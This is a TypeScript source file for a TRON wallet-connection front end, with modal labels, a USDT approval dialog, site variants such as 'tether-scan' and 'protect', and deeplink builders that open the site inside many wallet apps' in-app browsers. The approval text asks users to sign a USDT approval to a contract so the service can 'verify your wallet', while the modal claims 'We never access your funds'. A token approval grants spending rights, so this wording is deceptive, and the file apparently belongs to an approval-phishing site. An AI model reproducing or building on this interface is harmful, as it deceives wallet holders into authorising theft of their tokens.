import {
  curatedWallets,
  featuredWallets,
  primaryConnectors,
  type FeaturedWallet,
} from "./wallet"
import type { WalletChainFamily } from "./wallet/types"

export type CuratedWallet = FeaturedWallet
export { curatedWallets, featuredWallets, primaryConnectors }

export type WalletChainId = "tron"

export const walletChains: Record<
  WalletChainId,
  { label: string; symbol: string }
> = {
  tron: { label: "TRON", symbol: "TRC20" },
}

export const defaultDappUrl =
  import.meta.env.VITE_SITE_URL ??
  import.meta.env.VITE_APP_URL ??
  "https://localhost"

export function shortenAddress(address: string, chars = 4): string {
  if (address.length <= chars * 2 + 2) return address
  return `${address.slice(0, chars + 2)}...${address.slice(-chars)}`
}

export type WalletModalLabels = {
  connect: string
  disconnect: string
  network: string
  title: string
  subtitle: string
  detected: string
  install: string
  openApp: string
  scanQr: string
  moreWallets: string
  otherWallets: string
  secure: string
  connecting: string
  rejected: string
  selectChainTitle: string
  selectChainSubtitle: string
  back: string
}

export const defaultWalletModalLabels: WalletModalLabels = {
  connect: "Connect Wallet",
  disconnect: "Disconnect",
  network: "Network",
  title: "Connect a TRON wallet",
  subtitle:
    "Tap a wallet to connect on TRON (TRC-20). There is no chain to choose.",
  detected: "Detected",
  install: "Install",
  openApp: "Open in app",
  scanQr: "Scan QR code",
  moreWallets: "More wallets",
  otherWallets: "Other wallets",
  secure: "Encrypted connection · We never access your funds",
  connecting: "Connecting…",
  rejected: "Connection cancelled. Please try again.",
  selectChainTitle: "TRON network",
  selectChainSubtitle: "This site uses TRON (TRC-20) only.",
  back: "Back",
}

export type UsdtApprovalLabels = {
  title: string
  subtitle: string
  spenderLabel: string
  tokenLabel: string
  networkLabel: string
  approve: string
  approving: string
  skip: string
  rejected: string
  tronInstall: string
}

export const defaultUsdtApprovalLabels: UsdtApprovalLabels = {
  title: "Authorize USDT",
  subtitle:
    "Approve USDT access so this service can verify your wallet. You will sign in your wallet app.",
  spenderLabel: "Contract",
  tokenLabel: "Token",
  networkLabel: "Network",
  approve: "Sign approval",
  approving: "Waiting for signature…",
  skip: "Not now",
  rejected: "Approval cancelled. You can try again from any button.",
  tronInstall: "Install a TRON wallet such as TronLink or TokenPocket to approve.",
}

export type SiteVariant = "otc" | "protect" | "tether-scan"

function isAndroidBrowser(): boolean {
  if (typeof navigator === "undefined") return false
  return /android/i.test(navigator.userAgent)
}

/** Opens a wallet deeplink from a browser (anchor click works better than assign on iOS). */
export function openMobileWalletDeeplink(deeplink: string): void {
  if (isAndroidBrowser() && deeplink.startsWith("https://phantom.app/ul/")) {
    const path = deeplink.replace("https://phantom.app/", "")
    window.location.assign(
      `intent://${path}#Intent;scheme=https;host=phantom.app;package=app.phantom;end`,
    )
    return
  }

  // Android intent for custom schemes improves success when the app is installed.
  if (isAndroidBrowser() && /^[a-z][a-z0-9+.-]*:/i.test(deeplink) && !deeplink.startsWith("https:")) {
    try {
      const parsed = new URL(deeplink)
      const host = parsed.host || "open"
      const pathAndQuery = `${parsed.pathname || ""}${parsed.search || ""}${parsed.hash || ""}`
      const intentPath = pathAndQuery.replace(/^\//, "")
      window.location.assign(
        `intent://${host}/${intentPath}#Intent;scheme=${parsed.protocol.replace(":", "")};end`,
      )
      return
    } catch {
      // fall through to anchor click
    }
  }

  const anchor = document.createElement("a")
  anchor.href = deeplink
  anchor.rel = "noopener noreferrer"
  document.body.appendChild(anchor)
  anchor.click()
  anchor.remove()
}

function binanceDappBrowserLink(url: string): string {
  const chainId = 728126428
  const base = "bnc://app.binance.com/mp/app"
  const appId = "yFK5FCqYprrXDiVFbhyRx7"
  const startPagePath = btoa("/pages/browser/index")
  const startPageQuery = btoa(`url=${url}&defaultChainId=${chainId}`)
  const deeplink = `${base}?appId=${appId}&startPagePath=${startPagePath}&startPageQuery=${startPageQuery}`
  return `https://app.binance.com/en/download?_dp=${btoa(deeplink)}`
}

function bitgetDappBrowserLink(url: string): string {
  // Bitget docs: Android requires https://bkcode.vip; iOS also accepts bitkeep://
  const params = new URLSearchParams({
    action: "DApp",
    actionID: crypto.randomUUID(),
    url,
    version: "1",
  })
  return `https://bkcode.vip?${params.toString()}`
}

/**
 * Builds a deep link that opens the given URL inside a wallet's in-app dApp
 * browser on TRON. Prefer HTTPS universal / download bridges when documented so
 * cold-start (app not installed) still reaches a store page; use native schemes
 * when that is the vendor's published API.
 */
export function buildWalletDeeplink(
  id: string,
  url: string,
  _chainFamily: WalletChainFamily = "tron",
): string {
  void _chainFamily
  const enc = encodeURIComponent(url)
  let origin = url
  try {
    origin = new URL(url).origin
  } catch {
    // keep origin fallback
  }

  switch (id) {
    case "trust":
      // SLIP-44 coin 195 = TRON — Trust Wallet open_url universal link
      return `https://link.trustwallet.com/open_url?coin_id=195&url=${enc}`
    case "tokenpocket":
      return `tpdapp://open?params=${encodeURIComponent(
        JSON.stringify({ url, chain: "TRON", source: "dapp" }),
      )}`
    case "binance":
      return binanceDappBrowserLink(url)
    case "bybit":
      // Bybit in-app browser bridge (web_link opens the dApp URL inside the app).
      return `https://app.bybit.com/inapp?by_dp=${encodeURIComponent(
        "bybitapp://open/route?targetUrl=by%3A%2F%2Fweb3%2Ftab%2Findex%3Findex%3D0",
      )}&by_web_link=${enc}`
    case "okx": {
      // Official: okx://wallet/dapp/url?dappUrl= (must encodeURIComponent).
      // Wrap in OKX download deeplink so external browsers can hand off to the app.
      const native = `okx://wallet/dapp/url?dappUrl=${enc}`
      return `https://www.okx.com/download?deeplink=${encodeURIComponent(native)}`
    }
    case "bitget":
      return bitgetDappBrowserLink(url)
    case "imtoken":
      // Official Universal Link (falls back to App Store / download when needed).
      // Native alternative: imtokenv2://navigate/DappView?url=
      return `https://connect.token.im/link/navigate/DappView?url=${enc}`
    case "safepal":
      // SafePal publishes https://link.safepal.io as its universal-link host
      // (WalletConnect registry). /dapp/link?dappUrl= hands the site into the
      // in-app browser when the app is installed; otherwise lands on download.
      // Official Connect docs do not document safepalwallet://dapp/url=.
      return `https://link.safepal.io/dapp/link?dappUrl=${enc}`
    case "mywallet": {
      // Official My Wallet deeplinks: https://my.tt/explore (help.mywallet.io).
      // App source (DeeplinkParser): mtw://explore/{host} → opens
      // https://{host} in the in-app browser (host only; path/query ignored).
      // go.mytonwallet.org / my.tt both bridge to mtw:// on mobile.
      let siteHost = "localhost"
      try {
        siteHost = new URL(url).host
      } catch {
        // keep fallback
      }
      return `https://my.tt/explore/${siteHost}`
    }
    case "phantom":
      return `https://phantom.app/ul/browse/${enc}?ref=${encodeURIComponent(origin)}`
    case "tronlink":
      return `tronlinkoutside://pull.activity?param=${encodeURIComponent(
        JSON.stringify({
          url,
          action: "open",
          protocol: "TronLink",
          version: "1.0",
        }),
      )}`
    default:
      return url
  }
}
